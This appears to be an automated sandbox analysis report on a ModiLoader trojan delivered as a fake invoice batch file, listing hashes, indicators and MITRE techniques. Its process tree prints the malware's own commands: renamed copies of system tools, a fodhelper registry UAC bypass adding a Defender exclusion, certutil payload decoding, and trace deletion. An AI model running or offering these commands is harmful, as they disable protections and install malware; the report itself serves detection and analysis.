modiloader | ade4c81173fbb4420f1bce21ecfafe78757238840af567dde7a3421059631014

Analysis

max time kernel
144s
max time network
123s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
12/03/2024, 13:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PROFORMA INVOICE AGAINST PO PO05823-24.bat
Size

3.9MB
MD5

9046e68022d4bf996dde93052d67a9b5
SHA1

502662322e0a225d7dffc841c2a24c5c82582f07
SHA256

ade4c81173fbb4420f1bce21ecfafe78757238840af567dde7a3421059631014
SHA512

e433ba2c480032143de574ff8f5bebaa4adacbf2e8adf79637909260d78da2db63d391a5fff4ade32566eb021ed0a563de8ea797d49b3b8d13f877d45a9f10e7
SSDEEP

49152:OBHEIE8fhpytc5M7ZvRd5A81rmvyuZZGqdZWG4s3pU6C:9

Score

10^/10

modiloader trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

ModiLoader Second Stage 1 IoCs

resource	yara_rule
behavioral1/memory/3024-57-0x0000000003260000-0x0000000004260000-memory.dmp	modiloader_stage2

Executes dropped EXE 17 IoCs

pid	Process
2960	alpha.exe
2036	alpha.exe
2492	alpha.exe
2956	xkn.exe
2552	alpha.exe
2536	alpha.exe
2512	kn.exe
2404	alpha.exe
2416	kn.exe
2472	alpha.exe
3024	Lewxa.com
2568	alpha.exe
2888	alpha.exe
2120	alpha.exe
2376	alpha.exe
1744	alpha.exe
1832	alpha.exe

Loads dropped DLL 10 IoCs

pid	Process
1956	cmd.exe
1956	cmd.exe
1956	cmd.exe
2492	alpha.exe
2956	xkn.exe
2956	xkn.exe
2956	xkn.exe
2536	alpha.exe
1552	WerFault.exe
1552	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1552	3024	WerFault.exe	45

Kills process with taskkill 2 IoCs

evasion

pid	Process
1508	taskkill.exe
356	taskkill.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\ms-settings\shell\open\command	reg.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2408	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2324	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
3024	Lewxa.com

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2956	xkn.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2956	xkn.exe
Token: SeDebugPrivilege	1508	taskkill.exe
Token: SeDebugPrivilege	356	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1956 wrote to memory of 2132	1956	cmd.exe	29
PID 1956 wrote to memory of 2132	1956	cmd.exe	29
PID 1956 wrote to memory of 2132	1956	cmd.exe	29
PID 2132 wrote to memory of 2300	2132	cmd.exe	30
PID 2132 wrote to memory of 2300	2132	cmd.exe	30
PID 2132 wrote to memory of 2300	2132	cmd.exe	30
PID 1956 wrote to memory of 2960	1956	cmd.exe	31
PID 1956 wrote to memory of 2960	1956	cmd.exe	31
PID 1956 wrote to memory of 2960	1956	cmd.exe	31
PID 2960 wrote to memory of 2976	2960	alpha.exe	32
PID 2960 wrote to memory of 2976	2960	alpha.exe	32
PID 2960 wrote to memory of 2976	2960	alpha.exe	32
PID 1956 wrote to memory of 2036	1956	cmd.exe	33
PID 1956 wrote to memory of 2036	1956	cmd.exe	33
PID 1956 wrote to memory of 2036	1956	cmd.exe	33
PID 2036 wrote to memory of 2584	2036	alpha.exe	34
PID 2036 wrote to memory of 2584	2036	alpha.exe	34
PID 2036 wrote to memory of 2584	2036	alpha.exe	34
PID 1956 wrote to memory of 2492	1956	cmd.exe	35
PID 1956 wrote to memory of 2492	1956	cmd.exe	35
PID 1956 wrote to memory of 2492	1956	cmd.exe	35
PID 2492 wrote to memory of 2956	2492	alpha.exe	36
PID 2492 wrote to memory of 2956	2492	alpha.exe	36
PID 2492 wrote to memory of 2956	2492	alpha.exe	36
PID 2956 wrote to memory of 2552	2956	xkn.exe	37
PID 2956 wrote to memory of 2552	2956	xkn.exe	37
PID 2956 wrote to memory of 2552	2956	xkn.exe	37
PID 2552 wrote to memory of 2408	2552	alpha.exe	38
PID 2552 wrote to memory of 2408	2552	alpha.exe	38
PID 2552 wrote to memory of 2408	2552	alpha.exe	38
PID 1956 wrote to memory of 2536	1956	cmd.exe	39
PID 1956 wrote to memory of 2536	1956	cmd.exe	39
PID 1956 wrote to memory of 2536	1956	cmd.exe	39
PID 2536 wrote to memory of 2512	2536	alpha.exe	40
PID 2536 wrote to memory of 2512	2536	alpha.exe	40
PID 2536 wrote to memory of 2512	2536	alpha.exe	40
PID 1956 wrote to memory of 2404	1956	cmd.exe	41
PID 1956 wrote to memory of 2404	1956	cmd.exe	41
PID 1956 wrote to memory of 2404	1956	cmd.exe	41
PID 2404 wrote to memory of 2416	2404	alpha.exe	42
PID 2404 wrote to memory of 2416	2404	alpha.exe	42
PID 2404 wrote to memory of 2416	2404	alpha.exe	42
PID 1956 wrote to memory of 2472	1956	cmd.exe	43
PID 1956 wrote to memory of 2472	1956	cmd.exe	43
PID 1956 wrote to memory of 2472	1956	cmd.exe	43
PID 2472 wrote to memory of 2324	2472	alpha.exe	44
PID 2472 wrote to memory of 2324	2472	alpha.exe	44
PID 2472 wrote to memory of 2324	2472	alpha.exe	44
PID 1956 wrote to memory of 3024	1956	cmd.exe	45
PID 1956 wrote to memory of 3024	1956	cmd.exe	45
PID 1956 wrote to memory of 3024	1956	cmd.exe	45
PID 1956 wrote to memory of 3024	1956	cmd.exe	45
PID 1956 wrote to memory of 2568	1956	cmd.exe	46
PID 1956 wrote to memory of 2568	1956	cmd.exe	46
PID 1956 wrote to memory of 2568	1956	cmd.exe	46
PID 1956 wrote to memory of 2888	1956	cmd.exe	47
PID 1956 wrote to memory of 2888	1956	cmd.exe	47
PID 1956 wrote to memory of 2888	1956	cmd.exe	47
PID 1956 wrote to memory of 2120	1956	cmd.exe	48
PID 1956 wrote to memory of 2120	1956	cmd.exe	48
PID 1956 wrote to memory of 2120	1956	cmd.exe	48
PID 1956 wrote to memory of 2376	1956	cmd.exe	49
PID 1956 wrote to memory of 2376	1956	cmd.exe	49
PID 1956 wrote to memory of 2376	1956	cmd.exe	49

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\PROFORMA INVOICE AGAINST PO PO05823-24.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1956
- C:\Windows\system32\cmd.exe
  cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2132
- - C:\Windows\system32\extrac32.exe
    extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
    3⤵
    PID:2300
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2960
- - C:\Windows\system32\extrac32.exe
    extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
    3⤵
    PID:2976
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2036
- - C:\Windows\system32\extrac32.exe
    extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    3⤵
    PID:2584
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2492
- - C:\Users\Public\xkn.exe
    C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2956
  - - C:\Users\Public\alpha.exe
      "C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2552
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
        5⤵
        Modifies registry class
        Modifies registry key
        
        PID:2408
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PROFORMA INVOICE AGAINST PO PO05823-24.bat" "C:\\Users\\Public\\Lewxa.txt" 9
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2536
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PROFORMA INVOICE AGAINST PO PO05823-24.bat" "C:\\Users\\Public\\Lewxa.txt" 9
    3⤵
    - Executes dropped EXE
    PID:2512
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2404
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
    3⤵
    - Executes dropped EXE
    PID:2416
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c PING -n 3 127.0.0.1
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2472
- - C:\Windows\system32\PING.EXE
    PING -n 3 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:2324
- C:\Users\Public\Libraries\Lewxa.com
  C:\\Users\\Public\\Libraries\\Lewxa.com
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  PID:3024
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3024 -s 712
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:1552
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2568
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2888
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2120
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2376
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
  2⤵
  - Executes dropped EXE
  PID:1744
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM SystemSettings.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1508
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
  2⤵
  - Executes dropped EXE
  PID:1832
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM SystemSettingsAdminFlows.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:356
- C:\Windows\system32\cmd.exe
  cmd /c del "C:\Users\Public\alpha.exe" / A / F / Q / S
  2⤵
  PID:1368

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Lewxa.txt

Filesize
2.8MB

MD5
975e25a8051c1d0de162a23c260c5b5d

SHA1
810a893f73c93943b68efc754a741cac53cbe4ed

SHA256
aa831ac7d5d124de04f4c8ba044c1e9992aa8444e76211bfa48b732b72dd3e30

SHA512
9b228f6979599f9113aaac99700cef239636ca3082d1408e05795fdb3d6b31b87dfcac3ad40b8e29b0212ac2ca50456b85585694770b72e747d46450c22dae39

Download Submit
C:\Users\Public\Libraries\Lewxa.com

Filesize
1.4MB

MD5
4137d0c618df7e27ec028b736dd445f8

SHA1
bd25560c671122df766b31923cc092ff9857a40e

SHA256
de0a3a5c52c2d14d7b958cc74fd42453bb34495708d1f75374a2e496a11b0c9d

SHA512
fc28e8430f2858b38942688d209f66a362b249c8aa0c2eac2623839e30615d1de6263b39b728f22e3c9611404b405ab91d799434c2f314d63d71cf3edf4ab92f

Download Submit
\Users\Public\alpha.exe

Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
\Users\Public\kn.exe

Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
\Users\Public\xkn.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/2956-28-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

Filesize
9.6MB

Download
memory/2956-22-0x0000000001C80000-0x0000000001C88000-memory.dmp

Filesize
32KB

Download
memory/2956-31-0x0000000002970000-0x00000000029F0000-memory.dmp

Filesize
512KB

Download
memory/2956-32-0x0000000002970000-0x00000000029F0000-memory.dmp

Filesize
512KB

Download
memory/2956-33-0x0000000002970000-0x00000000029F0000-memory.dmp

Filesize
512KB

Download
memory/2956-34-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

Filesize
9.6MB

Download
memory/2956-29-0x0000000002970000-0x00000000029F0000-memory.dmp

Filesize
512KB

Download
memory/2956-30-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

Filesize
9.6MB

Download
memory/2956-21-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/3024-49-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/3024-56-0x0000000003260000-0x0000000004260000-memory.dmp

Filesize
16.0MB

Download
memory/3024-57-0x0000000003260000-0x0000000004260000-memory.dmp

Filesize
16.0MB

Download
memory/3024-60-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/3024-61-0x0000000000400000-0x0000000000572000-memory.dmp

Filesize
1.4MB

Download